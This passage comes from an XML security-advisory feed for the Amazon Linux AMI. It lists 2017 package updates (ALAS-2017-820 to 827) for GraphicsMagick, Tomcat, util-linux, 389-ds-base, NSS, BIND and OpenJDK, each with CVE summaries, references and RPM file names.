arch="i686"><filename>Packages/libRmath-3.3.3-1.51.amzn1.i686.rpm</filename></package><package name="R" version="3.3.3" release="1.51.amzn1" epoch="0" arch="i686"><filename>Packages/R-3.3.3-1.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-820</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-820: medium priority package update for GraphicsMagick</title><issued date="2017-04-20 06:08:00" /><updated date="2017-04-20 21:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-6335:
The QuantumTransferMode function in coders/tiff.c in GraphicsMagick 1.3.25 and earlier allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a small samples per pixel value in a CMYKA TIFF file.
1427975:
CVE-2017-6335 ImageMagick: Heap out-of-bounds read in tiff.c
CVE-2016-9830:
CVE-2016-8684:
CVE-2016-8683:
CVE-2016-8682:
CVE-2016-7997:
CVE-2016-7996:
CVE-2016-7800:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7800" title="" id="CVE-2016-7800" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7996" title="" id="CVE-2016-7996" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7997" title="" id="CVE-2016-7997" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8682" title="" id="CVE-2016-8682" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8683" title="" id="CVE-2016-8683" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8684" title="" id="CVE-2016-8684" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9830" title="" id="CVE-2016-9830" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6335" title="" id="CVE-2017-6335" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="GraphicsMagick-devel" version="1.3.25" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-devel-1.3.25-6.10.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-doc" version="1.3.25" release="6.10.amzn1" epoch="0" arch="noarch"><filename>Packages/GraphicsMagick-doc-1.3.25-6.10.amzn1.noarch.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.25" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-perl-1.3.25-6.10.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.25" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-debuginfo-1.3.25-6.10.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick" version="1.3.25" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-1.3.25-6.10.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.25" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-devel-1.3.25-6.10.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.25" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-1.3.25-6.10.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.25" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-devel-1.3.25-6.10.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.25" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-devel-1.3.25-6.10.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.25" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-debuginfo-1.3.25-6.10.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.25" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-perl-1.3.25-6.10.amzn1.i686.rpm</filename></package><package name="GraphicsMagick" version="1.3.25" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-1.3.25-6.10.amzn1.i686.rpm</filename></package><package name="GraphicsMagick-c++" version="1.3.25" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/GraphicsMagick-c++-1.3.25-6.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-821</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-821: important priority package update for tomcat6</title><issued date="2017-04-20 06:17:00" /><updated date="2017-04-20 21:55:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-5647:
A bug in the handling of the pipelined requests in Apache Tomcat 9.0.0.M1 to 9.0.0.M18, 8.5.0 to 8.5.12, 8.0.0.RC1 to 8.0.42, 7.0.0 to 7.0.76, and 6.0.0 to 6.0.52, when send file was used, results in the pipelined request being lost when send file processing of the previous request completed. This could result in responses appearing to be sent for the wrong request. For example, a user agent that sent requests A, B and C could see the correct response for request A, the response for request C for request B and no response for request C.
1441205:
CVE-2017-5647 tomcat: Incorrect handling of pipelined requests when send file was used
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5647" title="" id="CVE-2017-5647" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat6-docs-webapp" version="6.0.53" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-docs-webapp-6.0.53-1.11.amzn1.noarch.rpm</filename></package><package name="tomcat6-webapps" version="6.0.53" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-webapps-6.0.53-1.11.amzn1.noarch.rpm</filename></package><package name="tomcat6-admin-webapps" version="6.0.53" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-admin-webapps-6.0.53-1.11.amzn1.noarch.rpm</filename></package><package name="tomcat6-el-2.1-api" version="6.0.53" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-el-2.1-api-6.0.53-1.11.amzn1.noarch.rpm</filename></package><package name="tomcat6-servlet-2.5-api" version="6.0.53" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-servlet-2.5-api-6.0.53-1.11.amzn1.noarch.rpm</filename></package><package name="tomcat6-jsp-2.1-api" version="6.0.53" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-jsp-2.1-api-6.0.53-1.11.amzn1.noarch.rpm</filename></package><package name="tomcat6-lib" version="6.0.53" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-lib-6.0.53-1.11.amzn1.noarch.rpm</filename></package><package name="tomcat6" version="6.0.53" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-6.0.53-1.11.amzn1.noarch.rpm</filename></package><package name="tomcat6-javadoc" version="6.0.53" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-javadoc-6.0.53-1.11.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-822</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-822: important priority package update for tomcat7 tomcat8</title><issued date="2017-04-20 06:18:00" /><updated date="2017-04-20 21:56:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-5648:
While investigating bug 60718, it was noticed that some calls to application listeners in Apache Tomcat 9.0.0.M1 to 9.0.0.M17, 8.5.0 to 8.5.11, 8.0.0.RC1 to 8.0.41, and 7.0.0 to 7.0.75 did not use the appropriate facade object. When running an untrusted application under a SecurityManager, it was therefore possible for that untrusted application to retain a reference to the request or response object and thereby access and/or modify information associated with another web application.
1441223:
CVE-2017-5648 tomcat: Calls to application listeners did not use the appropriate facade object
CVE-2017-5647:
A bug in the handling of the pipelined requests in Apache Tomcat 9.0.0.M1 to 9.0.0.M18, 8.5.0 to 8.5.12, 8.0.0.RC1 to 8.0.42, 7.0.0 to 7.0.76, and 6.0.0 to 6.0.52, when send file was used, results in the pipelined request being lost when send file processing of the previous request completed. This could result in responses appearing to be sent for the wrong request. For example, a user agent that sent requests A, B and C could see the correct response for request A, the response for request C for request B and no response for request C.
1441205:
CVE-2017-5647 tomcat: Incorrect handling of pipelined requests when send file was used
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5647" title="" id="CVE-2017-5647" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5648" title="" id="CVE-2017-5648" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-servlet-3.0-api" version="7.0.77" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.77-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.77" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.77-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.77" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.77-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.77" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.77-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.77" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.77-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.77" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.77-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.77" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.77-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.77" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.77-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.77" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.77-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.77" release="1.26.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.77-1.26.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.0.43" release="1.70.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.0.43-1.70.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.0.43" release="1.70.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.0.43-1.70.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.0.43" release="1.70.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.0.43-1.70.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.0.43" release="1.70.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.0.43-1.70.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.0.43" release="1.70.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.0.43-1.70.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.0.43" release="1.70.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.0.43-1.70.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.0.43" release="1.70.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.0.43-1.70.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.0.43" release="1.70.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.0.43-1.70.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.0.43" release="1.70.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.0.43-1.70.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.0.43" release="1.70.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.0.43-1.70.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-823</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-823: medium priority package update for util-linux</title><issued date="2017-04-27 00:00:00" /><updated date="2017-04-27 19:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-2616:
A race condition was found in the way su handled the management of child processes. A local authenticated attacker could use this flaw to kill other processes with root privileges under specific conditions.
1418710:
CVE-2017-2616 util-linux: Sending SIGKILL to other processes with root privileges via su
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2616" title="" id="CVE-2017-2616" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libuuid-devel" version="2.23.2" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/libuuid-devel-2.23.2-33.28.amzn1.x86_64.rpm</filename></package><package name="libblkid" version="2.23.2" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/libblkid-2.23.2-33.28.amzn1.x86_64.rpm</filename></package><package name="util-linux" version="2.23.2" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/util-linux-2.23.2-33.28.amzn1.x86_64.rpm</filename></package><package name="libmount" version="2.23.2" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/libmount-2.23.2-33.28.amzn1.x86_64.rpm</filename></package><package name="libblkid-devel" version="2.23.2" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/libblkid-devel-2.23.2-33.28.amzn1.x86_64.rpm</filename></package><package name="libuuid" version="2.23.2" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/libuuid-2.23.2-33.28.amzn1.x86_64.rpm</filename></package><package name="util-linux-debuginfo" version="2.23.2" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/util-linux-debuginfo-2.23.2-33.28.amzn1.x86_64.rpm</filename></package><package name="uuidd" version="2.23.2" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/uuidd-2.23.2-33.28.amzn1.x86_64.rpm</filename></package><package name="libmount-devel" version="2.23.2" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/libmount-devel-2.23.2-33.28.amzn1.x86_64.rpm</filename></package><package name="util-linux" version="2.23.2" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/util-linux-2.23.2-33.28.amzn1.i686.rpm</filename></package><package name="libblkid-devel" version="2.23.2" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/libblkid-devel-2.23.2-33.28.amzn1.i686.rpm</filename></package><package name="libuuid" version="2.23.2" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/libuuid-2.23.2-33.28.amzn1.i686.rpm</filename></package><package name="uuidd" version="2.23.2" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/uuidd-2.23.2-33.28.amzn1.i686.rpm</filename></package><package name="libmount-devel" version="2.23.2" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/libmount-devel-2.23.2-33.28.amzn1.i686.rpm</filename></package><package name="util-linux-debuginfo" version="2.23.2" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/util-linux-debuginfo-2.23.2-33.28.amzn1.i686.rpm</filename></package><package name="libuuid-devel" version="2.23.2" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/libuuid-devel-2.23.2-33.28.amzn1.i686.rpm</filename></package><package name="libblkid" version="2.23.2" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/libblkid-2.23.2-33.28.amzn1.i686.rpm</filename></package><package name="libmount" version="2.23.2" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/libmount-2.23.2-33.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-824</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-824: important priority package update for 389-ds-base</title><issued date="2017-04-27 00:02:00" /><updated date="2017-04-27 19:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-2668:
An invalid pointer dereference flaw was found in the way 389-ds-base handled LDAP bind requests. A remote unauthenticated attacker could use this flaw to make ns-slapd crash via a specially crafted LDAP bind request, resulting in denial of service.
1436575:
CVE-2017-2668 389-ds-base: Remote crash via crafted LDAP messages
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2668" title="" id="CVE-2017-2668" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-debuginfo" version="1.3.5.10" release="20.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.5.10-20.50.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.5.10" release="20.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.5.10-20.50.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.5.10" release="20.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-snmp-1.3.5.10-20.50.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.5.10" release="20.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.5.10-20.50.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.5.10" release="20.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.5.10-20.50.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.5.10" release="20.50.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.5.10-20.50.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.5.10" release="20.50.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.5.10-20.50.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.5.10" release="20.50.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.5.10-20.50.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.5.10" release="20.50.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.5.10-20.50.amzn1.i686.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.5.10" release="20.50.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-snmp-1.3.5.10-20.50.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-825</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-825: critical priority package update for nss nss-util</title><issued date="2017-04-27 00:04:00" /><updated date="2017-04-27 19:52:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-5461:
* An out-of-bounds write flaw was found in the way NSS performed certain Base64-decoding operations. An attacker could use this flaw to create a specially crafted certificate which, when parsed by NSS, could cause it to crash or execute arbitrary code, using the permissions of the user running an application compiled against the NSS library.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5461" title="" id="CVE-2017-5461" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:1100.html" title="" id="RHSA-2017:1100" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-util" version="3.28.4" release="1.0.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-3.28.4-1.0.52.amzn1.x86_64.rpm</filename></package><package name="nss-util-devel" version="3.28.4" release="1.0.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-devel-3.28.4-1.0.52.amzn1.x86_64.rpm</filename></package><package name="nss-util-debuginfo" version="3.28.4" release="1.0.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-debuginfo-3.28.4-1.0.52.amzn1.x86_64.rpm</filename></package><package name="nss-util-debuginfo" version="3.28.4" release="1.0.52.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-debuginfo-3.28.4-1.0.52.amzn1.i686.rpm</filename></package><package name="nss-util" version="3.28.4" release="1.0.52.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-3.28.4-1.0.52.amzn1.i686.rpm</filename></package><package name="nss-util-devel" version="3.28.4" release="1.0.52.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-devel-3.28.4-1.0.52.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.28.4" release="1.0.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.28.4-1.0.78.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.28.4" release="1.0.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.28.4-1.0.78.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.28.4" release="1.0.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.28.4-1.0.78.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.28.4" release="1.0.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.28.4-1.0.78.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.28.4" release="1.0.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.28.4-1.0.78.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.28.4" release="1.0.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.28.4-1.0.78.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.28.4" release="1.0.78.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.28.4-1.0.78.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.28.4" release="1.0.78.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.28.4-1.0.78.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.28.4" release="1.0.78.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.28.4-1.0.78.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.28.4" release="1.0.78.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.28.4-1.0.78.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.28.4" release="1.0.78.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.28.4-1.0.78.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.28.4" release="1.0.78.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.28.4-1.0.78.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-826</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-826: important priority package update for bind</title><issued date="2017-04-27 00:07:00" /><updated date="2017-04-27 19:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3137:
* A denial of service flaw was found in the way BIND handled a query response containing CNAME or DNAME resource records in an unusual order. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS response.
CVE-2017-3136:
* A denial of service flaw was found in the way BIND handled query requests when using DNS64 with "break-dnssec yes" option. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS request.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3136" title="" id="CVE-2017-3136" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3137" title="" id="CVE-2017-3137" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:1105.html" title="" id="RHSA-2017:1105" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-devel" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.62.rc1.54.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.62.rc1.54.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.62.rc1.54.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.62.rc1.54.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.62.rc1.54.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.62.rc1.54.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.62.rc1.54.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.62.rc1.54.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.62.rc1.54.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.62.rc1.54.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.62.rc1.54.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.62.rc1.54.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.62.rc1.54.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.62.rc1.54.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.62.rc1.54.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-827</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-827: medium priority package update for java-1.8.0-openjdk</title><issued date="2017-05-09 23:21:00" /><updated date="2017-05-10 23:59:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3544:
A newline injection flaw was discovered in the SMTP client implementation in the Networking component in OpenJDK. A remote attacker could possibly use this flaw to manipulate SMTP connections established by a Java application.
1443068:
CVE-2017-3544 OpenJDK: newline injection in the SMTP client (Networking, 8171533)
CVE-2017-3539:
It was discovered that the Security component of OpenJDK did not allow users to restrict the set of algorithms allowed for Jar integrity verification. This flaw could allow an attacker to modify content of the Jar file that used weak signing key or hash algorithm.
1443097:
CVE-2017-3539 OpenJDK: MD5 allowed for jar verification (Security, 8171121)
CVE-2017-3533:
A newline injection flaw was discovered in the FTP client implementation in the Networking component in OpenJDK. A remote attacker could possibly use this flaw to manipulate FTP connections established by a Java application.
1443083:
CVE-2017-3533 OpenJDK: newline injection in the FTP client (Networking, 8170222)
CVE-2017-3526:
It was found that the JAXP component of OpenJDK failed to correctly enforce parse tree size limits when parsing XML document. An attacker able to make a Java application parse a specially crafted XML document could use this flaw to make it consume an excessive amount of CPU and memory.
1443252:
CVE-2017-3526 OpenJDK: incomplete XML parse tree size enforcement (JAXP, 8169011)
CVE-2017-3511:
An untrusted library search path flaw was found in the JCE component of OpenJDK. A local attacker could possibly use this flaw to cause a Java application using JCE to load an attacker-controlled library and hence escalate their privileges.
1443007:
CVE-2017-3511 OpenJDK: untrusted extension directories search path in Launcher (JCE, 8163528)
CVE-2017-3509:
It was discovered that the HTTP client implementation in the Networking component of OpenJDK could cache and re-use an NTLM authenticated connection in a different security context. A remote attacker could possibly use this flaw to make a Java application perform HTTP requests authenticated with credentials of a different user.
1443052:
CVE-2017-3509 OpenJDK: improper re-use of NTLM authenticated connections (Networking, 8163520)
CVE-2016-5542:
It was discovered that the Libraries component of OpenJDK did not restrict the set of algorithms used for JAR integrity verification. This flaw could allow an attacker to modify content of the JAR file that used weak signing key or hash algorithm.
1385723:
CVE-2016-5542 OpenJDK: missing algorithm restrictions for jar verification (Libraries, 8155973)
